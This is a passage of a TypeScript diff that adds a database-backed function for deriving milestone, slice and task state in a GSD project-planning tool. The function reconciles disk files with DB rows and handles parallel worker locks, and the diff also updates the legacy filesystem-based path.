+  // auto-start.ts because that guard only runs when gsd.db doesn't exist yet.
+  // Reconcile here so deriveStateFromDb never silently misses queued milestones.
+  // insertMilestone uses INSERT OR IGNORE, so this is safe to call every time.
+  const dbIdSet = new Set(allMilestones.map(m => m.id));
+  const diskIds = findMilestoneIds(basePath);
+  let synced = false;
+  for (const diskId of diskIds) {
+    if (!dbIdSet.has(diskId) && !isGhostMilestone(basePath, diskId)) {
+      insertMilestone({ id: diskId, status: 'active' });
+      synced = true;
+    }
+  }
+  if (synced) allMilestones = getAllMilestones();
+
+  // Disk→DB slice reconciliation (#2533): slices defined in ROADMAP.md but
+  // missing from the DB cause permanent "No slice eligible" blocks because
+  // the dependency resolver only sees DB rows. Parse each milestone's roadmap
+  // and insert any missing slices, checking SUMMARY files to set correct status.
+  // insertSlice uses INSERT OR IGNORE, so existing rows are never overwritten.
+  for (const mid of diskIds) {
+    if (isGhostMilestone(basePath, mid)) continue;
+    const roadmapPath = resolveMilestoneFile(basePath, mid, "ROADMAP");
+    if (!roadmapPath) continue;
+
+    const dbSlices = getMilestoneSlices(mid);
+    const dbSliceIds = new Set(dbSlices.map(s => s.id));
+
+    let roadmapContent: string;
+    try { roadmapContent = readFileSync(roadmapPath, "utf-8"); }
+    catch { continue; }
+
+    const parsed = parseRoadmap(roadmapContent);
+    for (const s of parsed.slices) {
+      if (dbSliceIds.has(s.id)) continue;
+      const summaryPath = resolveSliceFile(basePath, mid, s.id, "SUMMARY");
+      const sliceStatus = (s.done || summaryPath) ? "complete" : "pending";
+      insertSlice({
+        id: s.id, milestoneId: mid, title: s.title,
+        status: sliceStatus, risk: s.risk,
+        depends: s.depends, demo: s.demo,
+      });
+    }
+  }
+
+  // Reconcile: discover milestones that exist on disk but are missing from
+  // the DB. This happens when milestones were created before the DB migration
+  // or were manually added to the filesystem. Without this, disk-only
+  // milestones are invisible after migration (#2416).
+  const dbMilestoneIds = new Set(allMilestones.map(m => m.id));
+  const diskMilestoneIds = findMilestoneIds(basePath);
+  for (const diskId of diskMilestoneIds) {
+    if (!dbMilestoneIds.has(diskId)) {
+      // Synthesize a minimal MilestoneRow for the disk-only milestone.
+      // Title and status will be resolved from disk files in the loop below.
+      allMilestones.push({
+        id: diskId,
+        title: diskId,
+        status: 'active',
+        depends_on: [] as string[],
+        created_at: new Date().toISOString(),
+      } as MilestoneRow);
+    }
+  }
+  // Re-sort so milestones follow queue order (same as dispatch guard) (#2556)
+  const customOrder = loadQueueOrder(basePath);
+  const sortedIds = sortByQueueOrder(allMilestones.map(m => m.id), customOrder);
+  const byId = new Map(allMilestones.map(m => [m.id, m]));
+  allMilestones.length = 0;
+  for (const id of sortedIds) allMilestones.push(byId.get(id)!);
+
+  // Parallel worker isolation: when locked, filter to just the locked milestone
+  const milestoneLock = process.env.GSD_MILESTONE_LOCK;
+  const milestones = milestoneLock
+    ? allMilestones.filter(m => m.id === milestoneLock)
+    : allMilestones;
+
+  if (milestones.length === 0) {
+    return {
+      activeMilestone: null,
+      activeSlice: null,
+      activeTask: null,
+      phase: 'pre-planning',
+      recentDecisions: [],
+      blockers: [],
+      nextAction: 'No milestones found. Run /gsd to create one.',
+      registry: [],
+      requirements,
+      progress: { milestones: { done: 0, total: 0 } },
+    };
+  }
+
+  // Phase 1: Build completeness set (which milestones count as "done" for dep resolution)
+  const completeMilestoneIds = new Set<string>();
+  const parkedMilestoneIds = new Set<string>();
+
+  for (const m of milestones) {
+    // Check disk for PARKED flag (not stored in DB status reliably — disk is truth for flag files)
+    const parkedFile = resolveMilestoneFile(basePath, m.id, "PARKED");
+    if (parkedFile || m.status === 'parked') {
+      parkedMilestoneIds.add(m.id);
+      continue;
+    }
+
+    if (isStatusDone(m.status)) {
+      completeMilestoneIds.add(m.id);
+      continue;
+    }
+
+    // Check if milestone has a summary on disk (terminal artifact per #864)
+    const summaryFile = resolveMilestoneFile(basePath, m.id, "SUMMARY");
+    if (summaryFile) {
+      completeMilestoneIds.add(m.id);
+      continue;
+    }
+
+    // Milestones with all slices done but no SUMMARY file are in
+    // validating/completing state — intentionally NOT added to
+    // completeMilestoneIds.  The SUMMARY file (checked above) is the
+    // terminal artifact that proves completion per #864.
+  }
+
+  // Phase 2: Build registry and find active milestone
+  const registry: MilestoneRegistryEntry[] = [];
+  let activeMilestone: ActiveRef | null = null;
+  let activeMilestoneSlices: SliceRow[] = [];
+  let activeMilestoneFound = false;
+  let activeMilestoneHasDraft = false;
+  // Queued shells (DB row, no slices, no content files) are deferred during
+  // the main loop so they don't eclipse real active milestones (#3470).
+  // If no real active milestone is found, the first deferred shell is promoted.
+  let firstDeferredQueuedShell: { id: string; title: string; deps: string[] } | null = null;
+
+  for (const m of milestones) {
+    if (parkedMilestoneIds.has(m.id)) {
+      registry.push({ id: m.id, title: stripMilestonePrefix(m.title) || m.id, status: 'parked' });
+      continue;
+    }
+
+    // Ghost milestone check: no slices in DB AND no substantive files on disk.
+    // Skip queued milestones — they are handled by the deferred-shell logic below (#3470).
+    const slices = getMilestoneSlices(m.id);
+    if (slices.length === 0 && !isStatusDone(m.status) && m.status !== 'queued') {
+      // Check disk for ghost detection
+      if (isGhostMilestone(basePath, m.id)) continue;
+    }
+
+    const summaryFile = resolveMilestoneFile(basePath, m.id, "SUMMARY");
+
+    // Determine if this milestone is complete
+    if (completeMilestoneIds.has(m.id) || (summaryFile !== null)) {
+      // Get title from DB or summary
+      let title = stripMilestonePrefix(m.title) || m.id;
+      if (summaryFile && !m.title) {
+        const summaryContent = await loadFile(summaryFile);
+        if (summaryContent) {
+          title = parseSummary(summaryContent).title || m.id;
+        }
+      }
+      registry.push({ id: m.id, title, status: 'complete' });
+      completeMilestoneIds.add(m.id); // ensure it's in the set
+      continue;
+    }
+
+    // Not complete — determine if it should be active
+    const allSlicesDone = slices.length > 0 && slices.every(s => isStatusDone(s.status));
+
+    // Get title — prefer DB, fall back to context file extraction
+    let title = stripMilestonePrefix(m.title) || m.id;
+    if (title === m.id) {
+      const contextFile = resolveMilestoneFile(basePath, m.id, "CONTEXT");
+      const draftFile = resolveMilestoneFile(basePath, m.id, "CONTEXT-DRAFT");
+      const contextContent = contextFile ? await loadFile(contextFile) : null;
+      const draftContent = draftFile && !contextContent ? await loadFile(draftFile) : null;
+      title = extractContextTitle(contextContent || draftContent, m.id);
+    }
+
+    if (!activeMilestoneFound) {
+      // Check milestone-level dependencies
+      const deps = m.depends_on;
+      const depsUnmet = deps.some(dep => !completeMilestoneIds.has(dep));
+
+      if (depsUnmet) {
+        registry.push({ id: m.id, title, status: 'pending', dependsOn: deps });
+        continue;
+      }
+
+      // Defer queued shell milestones with no substantive content (#3470).
+      // A queued milestone with no slices and no context/draft file is a
+      // placeholder that should not block later real active milestones.
+      // If no real active milestone is found after the loop, the first
+      // deferred shell is promoted to active (#2921).
+      if (m.status === 'queued' && slices.length === 0) {
+        const contextFile = resolveMilestoneFile(basePath, m.id, "CONTEXT");
+        const draftFile = resolveMilestoneFile(basePath, m.id, "CONTEXT-DRAFT");
+        if (!contextFile && !draftFile) {
+          if (!firstDeferredQueuedShell) {
+            firstDeferredQueuedShell = { id: m.id, title, deps };
+          }
+          registry.push({ id: m.id, title, status: 'pending', ...(deps.length > 0 ? { dependsOn: deps } : {}) });
+          continue;
+        }
+      }
+
+      // Handle all-slices-done case (validating/completing)
+      if (allSlicesDone) {
+        const validationFile = resolveMilestoneFile(basePath, m.id, "VALIDATION");
+        const validationContent = validationFile ? await loadFile(validationFile) : null;
+        const validationTerminal = validationContent ? isValidationTerminal(validationContent) : false;
+
+        if (!validationTerminal || (validationTerminal && !summaryFile)) {
+          // Validating or completing — still active
+          activeMilestone = { id: m.id, title };
+          activeMilestoneSlices = slices;
+          activeMilestoneFound = true;
+          registry.push({ id: m.id, title, status: 'active', ...(deps.length > 0 ? { dependsOn: deps } : {}) });
+          continue;
+        }
+      }
+
+      // Check for context draft (needs-discussion phase)
+      const contextFile = resolveMilestoneFile(basePath, m.id, "CONTEXT");
+      const draftFile = resolveMilestoneFile(basePath, m.id, "CONTEXT-DRAFT");
+      if (!contextFile && draftFile) activeMilestoneHasDraft = true;
+
+      activeMilestone = { id: m.id, title };
+      activeMilestoneSlices = slices;
+      activeMilestoneFound = true;
+      registry.push({ id: m.id, title, status: 'active', ...(deps.length > 0 ? { dependsOn: deps } : {}) });
+    } else {
+      // After active milestone found — rest are pending
+      const deps = m.depends_on;
+      registry.push({ id: m.id, title, status: 'pending', ...(deps.length > 0 ? { dependsOn: deps } : {}) });
+    }
+  }
+
+  // Promote deferred queued shell if no real active milestone was found (#3470/#2921).
+  if (!activeMilestoneFound && firstDeferredQueuedShell) {
+    const shell = firstDeferredQueuedShell;
+    activeMilestone = { id: shell.id, title: shell.title };
+    activeMilestoneSlices = [];
+    activeMilestoneFound = true;
+    const entry = registry.find(e => e.id === shell.id);
+    if (entry) entry.status = 'active';
+  }
+
+  const milestoneProgress = {
+    done: registry.filter(e => e.status === 'complete').length,
+    total: registry.length,
+  };
+
+  // ── No active milestone ──────────────────────────────────────────────
+  if (!activeMilestone) {
+    const pendingEntries = registry.filter(e => e.status === 'pending');
+    const parkedEntries = registry.filter(e => e.status === 'parked');
+
+    if (pendingEntries.length > 0) {
+      const blockerDetails = pendingEntries
+        .filter(e => e.dependsOn && e.dependsOn.length > 0)
+        .map(e => `${e.id} is waiting on unmet deps: ${e.dependsOn!.join(', ')}`);
+      return {
+        activeMilestone: null, activeSlice: null, activeTask: null,
+        phase: 'blocked',
+        recentDecisions: [], blockers: blockerDetails.length > 0
+          ? blockerDetails
+          : ['All remaining milestones are dep-blocked but no deps listed — check CONTEXT.md files'],
+        nextAction: 'Resolve milestone dependencies before proceeding.',
+        registry, requirements,
+        progress: { milestones: milestoneProgress },
+      };
+    }
+
+    if (parkedEntries.length > 0) {
+      const parkedIds = parkedEntries.map(e => e.id).join(', ');
+      return {
+        activeMilestone: null, activeSlice: null, activeTask: null,
+        phase: 'pre-planning',
+        recentDecisions: [], blockers: [],
+        nextAction: `All remaining milestones are parked (${parkedIds}). Run /gsd unpark <id> or create a new milestone.`,
+        registry, requirements,
+        progress: { milestones: milestoneProgress },
+      };
+    }
+
+    if (registry.length === 0) {
+      return {
+        activeMilestone: null, activeSlice: null, activeTask: null,
+        phase: 'pre-planning',
+        recentDecisions: [], blockers: [],
+        nextAction: 'No milestones found. Run /gsd to create one.',
+        registry: [], requirements,
+        progress: { milestones: { done: 0, total: 0 } },
+      };
+    }
+
+    // All milestones complete
+    const lastEntry = registry[registry.length - 1];
+    const activeReqs = requirements.active ?? 0;
+    const completionNote = activeReqs > 0
+      ? `All milestones complete. ${activeReqs} active requirement${activeReqs === 1 ? '' : 's'} in REQUIREMENTS.md ${activeReqs === 1 ? 'has' : 'have'} not been mapped to a milestone.`
+      : 'All milestones complete.';
+    return {
+      activeMilestone: null,
+      lastCompletedMilestone: lastEntry ? { id: lastEntry.id, title: lastEntry.title } : null,
+      activeSlice: null, activeTask: null,
+      phase: 'complete',
+      recentDecisions: [], blockers: [],
+      nextAction: completionNote,
+      registry, requirements,
+      progress: { milestones: milestoneProgress },
+    };
+  }
+
+  // ── Active milestone has no slices or no roadmap ────────────────────
+  const hasRoadmap = resolveMilestoneFile(basePath, activeMilestone.id, "ROADMAP") !== null;
+
+  if (activeMilestoneSlices.length === 0) {
+    if (!hasRoadmap) {
+      const phase = activeMilestoneHasDraft ? 'needs-discussion' as const : 'pre-planning' as const;
+      const nextAction = activeMilestoneHasDraft
+        ? `Discuss draft context for milestone ${activeMilestone.id}.`
+        : `Plan milestone ${activeMilestone.id}.`;
+      return {
+        activeMilestone, activeSlice: null, activeTask: null,
+        phase, recentDecisions: [], blockers: [],
+        nextAction, registry, requirements,
+        progress: { milestones: milestoneProgress },
+      };
+    }
+
+    // Has roadmap file but zero slices in DB — pre-planning (zero-slice roadmap guard)
+    return {
+      activeMilestone, activeSlice: null, activeTask: null,
+      phase: 'pre-planning',
+      recentDecisions: [], blockers: [],
+      nextAction: `Milestone ${activeMilestone.id} has a roadmap but no slices defined. Add slices to the roadmap.`,
+      registry, requirements,
+      progress: {
+        milestones: milestoneProgress,
+        slices: { done: 0, total: 0 },
+      },
+    };
+  }
+
+  // ── All slices done → validating/completing ─────────────────────────
+  const allSlicesDone = activeMilestoneSlices.every(s => isStatusDone(s.status));
+  if (allSlicesDone) {
+    const validationFile = resolveMilestoneFile(basePath, activeMilestone.id, "VALIDATION");
+    const validationContent = validationFile ? await loadFile(validationFile) : null;
+    const validationTerminal = validationContent ? isValidationTerminal(validationContent) : false;
+    const verdict = validationContent ? extractVerdict(validationContent) : undefined;
+    const sliceProgress = {
+      done: activeMilestoneSlices.length,
+      total: activeMilestoneSlices.length,
+    };
+
+    // Force re-validation when verdict is needs-remediation — remediation slices
+    // may have completed since the stale validation was written (#3596).
+    if (!validationTerminal || verdict === 'needs-remediation') {
+      return {
+        activeMilestone, activeSlice: null, activeTask: null,
+        phase: 'validating-milestone',
+        recentDecisions: [], blockers: [],
+        nextAction: `Validate milestone ${activeMilestone.id} before completion.`,
+        registry, requirements,
+        progress: { milestones: milestoneProgress, slices: sliceProgress },
+      };
+    }
+
+    return {
+      activeMilestone, activeSlice: null, activeTask: null,
+      phase: 'completing-milestone',
+      recentDecisions: [], blockers: [],
+      nextAction: `All slices complete in ${activeMilestone.id}. Write milestone summary.`,
+      registry, requirements,
+      progress: { milestones: milestoneProgress, slices: sliceProgress },
+    };
+  }
+
+  // ── Find active slice (first incomplete with deps satisfied) ─────────
+  const sliceProgress = {
+    done: activeMilestoneSlices.filter(s => isStatusDone(s.status)).length,
+    total: activeMilestoneSlices.length,
+  };
+
+  const doneSliceIds = new Set(
+    activeMilestoneSlices.filter(s => isStatusDone(s.status)).map(s => s.id)
+  );
+
+  let activeSlice: ActiveRef | null = null;
+  let activeSliceRow: SliceRow | null = null;
+
+  // ── Slice-level parallel worker isolation ─────────────────────────────
+  // When GSD_SLICE_LOCK is set, this process is a parallel worker scoped
+  // to a single slice. Override activeSlice to only the locked slice ID.
+  const sliceLock = process.env.GSD_SLICE_LOCK;
+  if (sliceLock) {
+    const lockedSlice = activeMilestoneSlices.find(s => s.id === sliceLock);
+    if (lockedSlice) {
+      activeSlice = { id: lockedSlice.id, title: lockedSlice.title };
+      activeSliceRow = lockedSlice;
+    } else {
+      logWarning("state", `GSD_SLICE_LOCK=${sliceLock} not found in active slices — worker has no assigned work`);
+      // Don't silently continue — this is a dispatch error
+      return {
+        activeMilestone, activeSlice: null, activeTask: null,
+        phase: 'blocked',
+        recentDecisions: [], blockers: [`GSD_SLICE_LOCK=${sliceLock} not found in active milestone slices`],
+        nextAction: 'Slice lock references a non-existent slice — check orchestrator dispatch.',
+        registry, requirements,
+        progress: { milestones: milestoneProgress, slices: sliceProgress },
+      };
+    }
+  } else {
+    for (const s of activeMilestoneSlices) {
+      if (isStatusDone(s.status)) continue;
+      // #2661: Skip deferred slices — a decision explicitly deferred this work.
+      // Without this guard the dispatcher would keep dispatching deferred slices
+      // because DECISIONS.md is only contextual, not authoritative for dispatch.
+      if (isDeferredStatus(s.status)) continue;
+      if (s.depends.every(dep => doneSliceIds.has(dep))) {
+        activeSlice = { id: s.id, title: s.title };
+        activeSliceRow = s;
+        break;
+      }
+    }
+  }
+
+  if (!activeSlice) {
+    return {
+      activeMilestone, activeSlice: null, activeTask: null,
+      phase: 'blocked',
+      recentDecisions: [], blockers: ['No slice eligible — check dependency ordering'],
+      nextAction: 'Resolve dependency blockers or plan next slice.',
+      registry, requirements,
+      progress: { milestones: milestoneProgress, slices: sliceProgress },
+    };
+  }
+
+  // ── Check for slice plan file on disk ────────────────────────────────
+  const planFile = resolveSliceFile(basePath, activeMilestone.id, activeSlice.id, "PLAN");
+  if (!planFile) {
+    return {
+      activeMilestone, activeSlice, activeTask: null,
+      phase: 'planning',
+      recentDecisions: [], blockers: [],
+      nextAction: `Plan slice ${activeSlice.id} (${activeSlice.title}).`,
+      registry, requirements,
+      progress: { milestones: milestoneProgress, slices: sliceProgress },
+    };
+  }
+
+  // ── Get tasks from DB ────────────────────────────────────────────────
+  let tasks = getSliceTasks(activeMilestone.id, activeSlice.id);
+
+  // ── Reconcile missing tasks: plan file has tasks but DB is empty (#3600) ──
+  // When the planning agent writes S##-PLAN.md with task entries but never
+  // calls the gsd_plan_slice persistence tool, the DB has zero task rows
+  // even though the plan file contains valid tasks. Without this reconciliation,
+  // deriveState returns phase='planning' forever — the dispatcher re-dispatches
+  // plan-slice in an infinite loop.
+  if (tasks.length === 0 && planFile) {
+    try {
+      const planContent = await loadFile(planFile);
+      if (planContent) {
+        const diskPlan = parsePlan(planContent);
+        if (diskPlan.tasks.length > 0) {
+          for (let i = 0; i < diskPlan.tasks.length; i++) {
+            const t = diskPlan.tasks[i];
+            try {
+              insertTask({
+                id: t.id,
+                sliceId: activeSlice.id,
+                milestoneId: activeMilestone.id,
+                title: t.title,
+                status: t.done ? 'complete' : 'pending',
+                sequence: i + 1,
+              });
+            } catch (insertErr) {
+              // Task may already exist from a partial previous import — skip
+              logWarning("reconcile", `failed to insert task ${t.id} from plan file: ${insertErr instanceof Error ? insertErr.message : String(insertErr)}`);
+            }
+          }
+          tasks = getSliceTasks(activeMilestone.id, activeSlice.id);
+          logWarning("reconcile", `imported ${tasks.length} tasks from plan file for ${activeMilestone.id}/${activeSlice.id} — DB was empty (#3600)`, { mid: activeMilestone.id, sid: activeSlice.id });
+        }
+      }
+    } catch (err) {
+      // Non-fatal — fall through to the existing "empty plan" logic
+      logError("reconcile", `plan-file task import failed for ${activeMilestone.id}/${activeSlice.id}: ${err instanceof Error ? err.message : String(err)}`);
+    }
+  }
+
+  // ── Reconcile stale task status (#2514) ──────────────────────────────
+  // When a session disconnects after the agent writes SUMMARY + VERIFY
+  // artifacts but before postUnitPostVerification updates the DB, tasks
+  // remain "pending" in the DB despite being complete on disk. Without
+  // reconciliation, deriveState keeps returning the stale task as active,
+  // causing the dispatcher to re-dispatch the same completed task forever.
+  let reconciled = false;
+  for (const t of tasks) {
+    if (isStatusDone(t.status)) continue;
+    const summaryPath = resolveTaskFile(basePath, activeMilestone.id, activeSlice.id, t.id, "SUMMARY");
+    if (summaryPath && existsSync(summaryPath)) {
+      try {
+        updateTaskStatus(activeMilestone.id, activeSlice.id, t.id, "complete");
+        logWarning("reconcile", `task ${activeMilestone.id}/${activeSlice.id}/${t.id} status reconciled from "${t.status}" to "complete" (#2514)`, { mid: activeMilestone.id, sid: activeSlice.id, tid: t.id });
+        reconciled = true;
+      } catch (e) {
+        // DB write failed — continue with stale status rather than crash
+        logError("reconcile", `failed to update task ${t.id}`, { tid: t.id, error: (e as Error).message });
+      }
+    }
+  }
+  // Re-fetch tasks if any were reconciled so downstream logic sees fresh status
+  if (reconciled) {
+    tasks = getSliceTasks(activeMilestone.id, activeSlice.id);
+  }
+
+  const taskProgress = {
+    done: tasks.filter(t => isStatusDone(t.status)).length,
+    total: tasks.length,
+  };
+
+  const activeTaskRow = tasks.find(t => !isStatusDone(t.status));
+
+  if (!activeTaskRow && tasks.length > 0) {
+    // All tasks done but slice not marked complete → summarizing
+    return {
+      activeMilestone, activeSlice, activeTask: null,
+      phase: 'summarizing',
+      recentDecisions: [], blockers: [],
+      nextAction: `All tasks done in ${activeSlice.id}. Write slice summary and complete slice.`,
+      registry, requirements,
+      progress: { milestones: milestoneProgress, slices: sliceProgress, tasks: taskProgress },
+    };
+  }
+
+  // Empty plan — no tasks defined yet
+  if (!activeTaskRow) {
+    return {
+      activeMilestone, activeSlice, activeTask: null,
+      phase: 'planning',
+      recentDecisions: [], blockers: [],
+      nextAction: `Slice ${activeSlice.id} has a plan file but no tasks. Add tasks to the plan.`,
+      registry, requirements,
+      progress: { milestones: milestoneProgress, slices: sliceProgress, tasks: taskProgress },
+    };
+  }
+
+  const activeTask: ActiveRef = { id: activeTaskRow.id, title: activeTaskRow.title };
+
+  // ── Task plan file check (#909) ─────────────────────────────────────
+  const tasksDir = resolveTasksDir(basePath, activeMilestone.id, activeSlice.id);
+  if (tasksDir && existsSync(tasksDir) && tasks.length > 0) {
+    const allFiles = readdirSync(tasksDir).filter(f => f.endsWith(".md"));
+    if (allFiles.length === 0) {
+      return {
+        activeMilestone, activeSlice, activeTask: null,
+        phase: 'planning',
+        recentDecisions: [], blockers: [],
+        nextAction: `Task plan files missing for ${activeSlice.id}. Run plan-slice to generate task plans.`,
+        registry, requirements,
+        progress: { milestones: milestoneProgress, slices: sliceProgress, tasks: taskProgress },
+      };
+    }
+  }
+
+  // ── Quality gate evaluation check ──────────────────────────────────
+  // If slice-scoped gates (Q3/Q4) are still pending, pause before execution
+  // so the gate-evaluate dispatch rule can run parallel sub-agents.
+  // Slices with zero gate rows (pre-feature or simple) skip straight through.
+  const pendingGateCount = getPendingSliceGateCount(activeMilestone.id, activeSlice.id);
+  if (pendingGateCount > 0) {
+    return {
+      activeMilestone, activeSlice, activeTask: null,
+      phase: 'evaluating-gates',
+      recentDecisions: [], blockers: [],
+      nextAction: `Evaluate ${pendingGateCount} quality gate(s) for ${activeSlice.id} before execution.`,
+      registry, requirements,
+      progress: { milestones: milestoneProgress, slices: sliceProgress, tasks: taskProgress },
+    };
+  }
+
+  // ── Blocker detection: check completed tasks for blocker_discovered ──
+  const completedTasks = tasks.filter(t => isStatusDone(t.status));
+  let blockerTaskId: string | null = null;
+  for (const ct of completedTasks) {
+    if (ct.blocker_discovered) {
+      blockerTaskId = ct.id;
+      break;
+    }
+    // Also check disk summary in case DB doesn't have the flag
+    const summaryFile = resolveTaskFile(basePath, activeMilestone.id, activeSlice.id, ct.id, "SUMMARY");
+    if (!summaryFile) continue;
+    const summaryContent = await loadFile(summaryFile);
+    if (!summaryContent) continue;
+    const summary = parseSummary(summaryContent);
+    if (summary.frontmatter.blocker_discovered) {
+      blockerTaskId = ct.id;
+      break;
+    }
+  }
+
+  if (blockerTaskId) {
+    // Loop protection: if replan_history has entries for this slice, a replan
+    // was already performed — don't re-enter replanning phase.
+    const replanHistory = getReplanHistory(activeMilestone.id, activeSlice.id);
+    if (replanHistory.length === 0) {
+      return {
+        activeMilestone, activeSlice, activeTask,
+        phase: 'replanning-slice',
+        recentDecisions: [],
+        blockers: [`Task ${blockerTaskId} discovered a blocker requiring slice replan`],
+        nextAction: `Task ${blockerTaskId} reported blocker_discovered. Replan slice ${activeSlice.id} before continuing.`,
+        activeWorkspace: undefined,
+        registry, requirements,
+        progress: { milestones: milestoneProgress, slices: sliceProgress, tasks: taskProgress },
+      };
+    }
+  }
+
+  // ── REPLAN-TRIGGER detection ─────────────────────────────────────────
+  if (!blockerTaskId) {
+    const sliceRow = getSlice(activeMilestone.id, activeSlice.id);
+    // Check DB column first, fall back to disk trigger file when DB write
+    // was best-effort and failed (triage-resolution.ts dual-write gap).
+    const dbTriggered = !!sliceRow?.replan_triggered_at;
+    const diskTriggered = !dbTriggered &&
+      !!resolveSliceFile(basePath, activeMilestone.id, activeSlice.id, "REPLAN-TRIGGER");
+    if (dbTriggered || diskTriggered) {
+      // Loop protection: if replan_history has entries, replan was already done
+      const replanHistory = getReplanHistory(activeMilestone.id, activeSlice.id);
+      if (replanHistory.length === 0) {
+        return {
+          activeMilestone, activeSlice, activeTask,
+          phase: 'replanning-slice',
+          recentDecisions: [],
+          blockers: ['Triage replan trigger detected — slice replan required'],
+          nextAction: `Triage replan triggered for slice ${activeSlice.id}. Replan before continuing.`,
+          activeWorkspace: undefined,
+          registry, requirements,
+          progress: { milestones: milestoneProgress, slices: sliceProgress, tasks: taskProgress },
+        };
+      }
+    }
+  }
+
+  // ── Check for interrupted work ───────────────────────────────────────
+  const sDir = resolveSlicePath(basePath, activeMilestone.id, activeSlice.id);
+  const continueFile = sDir ? resolveSliceFile(basePath, activeMilestone.id, activeSlice.id, "CONTINUE") : null;
+  const hasInterrupted = !!(continueFile && await loadFile(continueFile)) ||
+    !!(sDir && await loadFile(join(sDir, "continue.md")));
+
+  return {
+    activeMilestone, activeSlice, activeTask,
+    phase: 'executing',
+    recentDecisions: [], blockers: [],
+    nextAction: hasInterrupted
+      ? `Resume interrupted work on ${activeTask.id}: ${activeTask.title} in slice ${activeSlice.id}. Read continue.md first.`
+      : `Execute ${activeTask.id}: ${activeTask.title} in slice ${activeSlice.id}.`,
+    registry, requirements,
+    progress: { milestones: milestoneProgress, slices: sliceProgress, tasks: taskProgress },
+  };
+}
+
+// LEGACY: Filesystem-based state derivation for unmigrated projects.
+// DB-backed projects use deriveStateFromDb() above. Target: extract to
+// state-legacy.ts when all projects are DB-backed.
+export async function _deriveStateImpl(basePath: string): Promise<GSDState> {
   const milestoneIds = findMilestoneIds(basePath);
 
   // ── Parallel worker isolation ──────────────────────────────────────────
@@ -212,12 +1014,9 @@ async function _deriveStateImpl(basePath: string): Promise<GSDState> {
   const fileContentCache = new Map<string, string>();
   const gsdDir = gsdRoot(basePath);
 
-  // NOTE: We intentionally do NOT load from the SQLite DB here (#759).
-  // The DB's artifacts table is populated once during migrateFromMarkdown
-  // and is never updated when files change on disk (e.g. roadmap [x] updates,
-  // plan checkbox changes). Using stale DB content causes deriveState to
-  // return incorrect phase/slice state, leading to infinite skip loops.
-  // The native Rust batch parser is fast enough for state derivation.
+  // Filesystem fallback: used when deriveStateFromDb() is not available
+  // (pre-migration projects). The DB-backed path is preferred when available
+  // — see deriveStateFromDb() above.
   const batchFiles = nativeBatchParseGsdFiles(gsdDir);
   if (batchFiles) {
     for (const f of batchFiles) {
@@ -313,7 +1112,7 @@ async function _deriveStateImpl(basePath: string): Promise<GSDState> {
     if (parkedMilestoneIds.has(mid)) {
       const roadmap = roadmapCache.get(mid) ?? null;
       const title = roadmap
-        ? roadmap.title.replace(/^M\d+(?:-[a-z0-9]{6})?[^:]*:\s*/, '')
+        ? stripMilestonePrefix(roadmap.title)
         : mid;
       registry.push({ id: mid, title, status: 'parked' });
       continue;
@@ -374,7 +1173,7 @@ async function _deriveStateImpl(basePath: string): Promise<GSDState> {
       continue;
     }
 
-    const title = roadmap.title.replace(/^M\d+(?:-[a-z0-9]{6})?[^:]*:\s*/, '');
+    const title = stripMilestonePrefix(roadmap.title);
     const complete = isMilestoneComplete(roadmap);
 
     if (complete) {
@@ -383,22 +1182,25 @@ async function _deriveStateImpl(basePath: string): Promise<GSDState> {
       const validationFile = resolveMilestoneFile(basePath, mid, "VALIDATION");
       const validationContent = validationFile ? await cachedLoadFile(validationFile) : null;
       const validationTerminal = validationContent ? isValidationTerminal(validationContent) : false;
+      const verdict = validationContent ? extractVerdict(validationContent) : undefined;
+      // needs-remediation is terminal but requires re-validation (#3596)
+      const needsRevalidation = !validationTerminal || verdict === 'needs-remediation';
 
       if (summaryFile) {
         // Summary exists → milestone is complete regardless of validation state.
         // The summary is the terminal artifact (#864).
         registry.push({ id: mid, title, status: 'complete' });
-      } else if (!validationTerminal && !activeMilestoneFound) {
-        // No summary and no terminal validation → validating-milestone
+      } else if (needsRevalidation && !activeMilestoneFound) {
+        // No summary and needs (re-)validation → validating-milestone
         activeMilestone = { id: mid, title };
         activeRoadmap = roadmap;
         activeMilestoneFound = true;
         registry.push({ id: mid, title, status: 'active' });
-      } else if (!validationTerminal && activeMilestoneFound) {
-        // No summary and no terminal validation, but another milestone is already active
+      } else if (needsRevalidation && activeMilestoneFound) {
+        // Needs (re-)validation, but another milestone is already active
         registry.push({ id: mid, title, status: 'pending' });
       } else if (!activeMilestoneFound) {
-        // Terminal validation but no summary → completing-milestone
+        // Terminal validation (pass/needs-attention) but no summary → completing-milestone
         activeMilestone = { id: mid, title };
         activeRoadmap = roadmap;
         activeMilestoneFound = true;
@@ -515,7 +1317,8 @@ async function _deriveStateImpl(basePath: string): Promise<GSDState> {
       ? `All milestones complete. ${activeReqs} active requirement${activeReqs === 1 ? '' : 's'} in REQUIREMENTS.md ${activeReqs === 1 ? 'has' : 'have'} not been mapped to a milestone.`
       : 'All milestones complete.';
     return {
-      activeMilestone: lastEntry ? { id: lastEntry.id, title: lastEntry.title } : null,
+      activeMilestone: null,
+      lastCompletedMilestone: lastEntry ? { id: lastEntry.id, title: lastEntry.title } : null,
       activeSlice: null,
       activeTask: null,
       phase: 'complete',
@@ -583,12 +1386,15 @@ async function _deriveStateImpl(basePath: string): Promise<GSDState> {
     const validationFile = resolveMilestoneFile(basePath, activeMilestone.id, "VALIDATION");
     const validationContent = validationFile ? await cachedLoadFile(validationFile) : null;
     const validationTerminal = validationContent ? isValidationTerminal(validationContent) : false;
+    const verdict = validationContent ? extractVerdict(validationContent) : undefined;
     const sliceProgress = {
       done: activeRoadmap.slices.length,
       total: activeRoadmap.slices.length,
     };
 
-    if (!validationTerminal) {
+    // Force re-validation when verdict is needs-remediation — remediation slices
+    // may have completed since the stale validation was written (#3596).
+    if (!validationTerminal || verdict === 'needs-remediation') {
       return {
         activeMilestone,
         activeSlice: null,
@@ -632,11 +1438,38 @@ async function _deriveStateImpl(basePath: string): Promise<GSDState> {
   const doneSliceIds = new Set(activeRoadmap.slices.filter(s => s.done).map(s => s.id));
   let activeSlice: ActiveRef | null = null;
 
-  for (const s of activeRoadmap.slices) {
-    if (s.done) continue;
-    if (s.depends.every(dep => doneSliceIds.has(dep))) {
-      activeSlice = { id: s.id, title: s.title };
-      break;
+  // ── Slice-level parallel worker isolation ─────────────────────────────
+  // When GSD_SLICE_LOCK is set, override activeSlice to only the locked slice.
+  const sliceLockLegacy = process.env.GSD_SLICE_LOCK;
+  if (sliceLockLegacy) {
+    const lockedSlice = activeRoadmap.slices.find(s => s.id === sliceLockLegacy);
+    if (lockedSlice) {
+      activeSlice = { id: lockedSlice.id, title: lockedSlice.title };
+    } else {
